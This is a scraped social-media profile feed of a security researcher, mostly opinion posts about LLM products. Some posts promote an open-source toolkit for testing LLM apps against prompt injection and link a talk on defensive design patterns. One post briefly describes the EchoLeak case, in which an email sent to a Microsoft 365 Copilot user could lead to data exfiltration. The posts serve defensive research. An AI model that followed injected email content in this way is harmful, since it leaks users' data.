Donato Capitella
@dcapitella
I'm a Software Engineer and Ethical Hacker, but mostly a tech enthusiast who likes to discover how things work by breaking them apart.
Introducing spikee, an open-source toolkit for testing LLM applications against prompt injection attacks that can lead to exploitation—like data exfiltration, XSS, and resource exhaustion. Easily create custom datasets to match your specific use cases. spikee.ai

I think there should be a law banning people from ever working in IT if they implement in 2025 input fields that do not support copy/paste. This should be punished with jail time.
I hate GPT4o batshit personality, when it starts a canvas but then terminates it prematurely with "..." and then starts crying because it can't find the text to edit. AGI is just around the corner :)
Having spent a month using Sonnet4/Gemini2.5, I guarantee vibe coding is not for people that are not experienced at logic. Unless you're doing something heavily represented in the training set, the outputs require lots of in-context learning and correction to be useful.
You can check out the github repo with sample implementations here: github.com/ReversecLabs/d…
youtu.be/2Er7bmyhPfM Just released a deep dive into one of my favourite LLM security papers: “Design Patterns for Securing LLM Agents against Prompt Injections”, walking through each pattern, real-world tradeoffs, and live code implementations.
youtu.be/2Er7bmyhPfM Just released a deep dive into one of my favourite LLM security papers: “Design Patterns for Securing LLM Agents against Prompt Injections”, walking through each pattern, real-world tradeoffs, and live code implementations.
One of the most annoying things with @AnthropicAI is that if you run out of quota in a chat with Opus, you cannot just switch to Sonnet in the same chat - this is infuriating.
Gemini-2.5-pro... such a smart model. The language it uses when reasoning is hilarious. The core insight I provided is that we were editing a PYTHON script and it produced all of a sudden JAVA code. Real head-scratcher.

Of all the LLMs, Gemini2.5-pro is the most usles and in spite of its long content, it's the least capable of making use of context while coding. Basically, it mostly produces garbage, forgets methods and botches stuff up. Literally useless past the 50k context mark.
An in-depth look at the recently published EchoLeak vulnerability on M365 Copilot by @Aim_Security_ that could lead to data exfiltration just by sending an email to a user who uses Microsoft Office365 Copilot. youtu.be/Myf1cLsUxsk

"Design Patterns for Securing LLM Agents against Prompt Injections" is an excellent new paper that provides six design patterns to help protect LLM tool-using systems (call them "agents" if you like) against prompt injection attacks
The reason this disturbs me is that it shows a complete lack of attention to detail. I can't trust o3 to read legislation carefully if it reads what it wants to read, not what is actually there
This TBF 👇
Are you afraid to hit Enter in any chat interface now? OpenAI's disrespectful approach to UX resulted in Enter sending the message in most chat interfaces. Previously, Shift-Enter did that. Now, I'm never sure what to do to avoid sending an unfinished message when I just want…
Are you afraid to hit Enter in any chat interface now? OpenAI's disrespectful approach to UX resulted in Enter sending the message in most chat interfaces. Previously, Shift-Enter did that. Now, I'm never sure what to do to avoid sending an unfinished message when I just want…
Just as a FYI, we still haven't mapped the biological brains of anything more complex than worms. It's OK to talk about digital brains, but comparing it to a biological one is premature and just polarizing. Ilya is talking about a future maybe a century from now, where AI is…